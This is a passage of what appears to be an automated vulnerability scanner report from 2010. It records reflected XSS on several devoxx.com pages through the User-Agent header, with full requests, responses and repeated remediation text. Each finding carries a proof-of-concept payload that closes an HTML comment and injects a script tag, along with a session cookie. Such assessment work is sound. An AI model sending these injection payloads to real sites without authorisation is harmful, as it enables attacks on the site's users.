Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedule HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9affa--><script>alert(1)</script>0ec3a0f0447 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:36 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842836081 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 38721
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9affa--><script>alert(1)</script>0ec3a0f0447' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedule' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 4e81e--><script>alert(1)</script>e07c32ab7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedule+REST+interface HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4e81e--><script>alert(1)</script>e07c32ab7 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:42:08 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842928576 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 75557
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4e81e--><script>alert(1)</script>e07c32ab7' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedule+REST+interface' contextPath : '' action name : 'vi ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 3b336--><script>alert(1)</script>4650d9ff903 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Schedules HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b336--><script>alert(1)</script>4650d9ff903 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:41:45 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842905939 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 44899
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3b336--><script>alert(1)</script>4650d9ff903' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Schedules' contextPath : '' action name : 'viewpage' *** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload ae756--><script>alert(1)</script>b9448b28231 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Sidebar HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae756--><script>alert(1)</script>b9448b28231 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:40:27 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842827436 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 34272
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae756--><script>alert(1)</script>b9448b28231' layout : 'Builder Layout: DEVOXX2010' layoutId : 'DEVOXX2010' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Sidebar' contextPath : '' action name : 'viewpage' ***** ...[SNIP]...
The value of the User-Agent HTTP header is copied into an HTML comment. The payload c81b5--><script>alert(1)</script>5594fe23ee7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Sponsors HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c81b5--><script>alert(1)</script>5594fe23ee7 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:43:01 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289842981133 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 42422
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c81b5--><script>alert(1)</script>5594fe23ee7' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Sponsors' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload 29266--><script>alert(1)</script>6dfe39b9927 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /display/Devoxx2K10/Twitter HTTP/1.1 Host: devoxx.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29266--><script>alert(1)</script>6dfe39b9927 Connection: close Cookie: JSESSIONID=D5313254AFFC9A0CE82BE5FDA21303DD;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 17:43:28 GMT Cache-Control: no-cache, must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT X-Confluence-Request-Time: 1289843008668 Content-Type: text/html;charset=UTF-8 Connection: close Content-Length: 48596
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- userAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)29266--><script>alert(1)</script>6dfe39b9927' layout : 'Builder Layout: DEVOXX2010NSB' layoutId : 'DEVOXX2010NSB' spaceName : 'Devoxx 2010' currentURL : '/display/Devoxx2K10/Twitter' contextPath : '' action name : 'viewpage'
The value of the User-Agent HTTP header is copied into an HTML comment. The payload d93d1--><script>alert(1)</script>8a3892b45b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.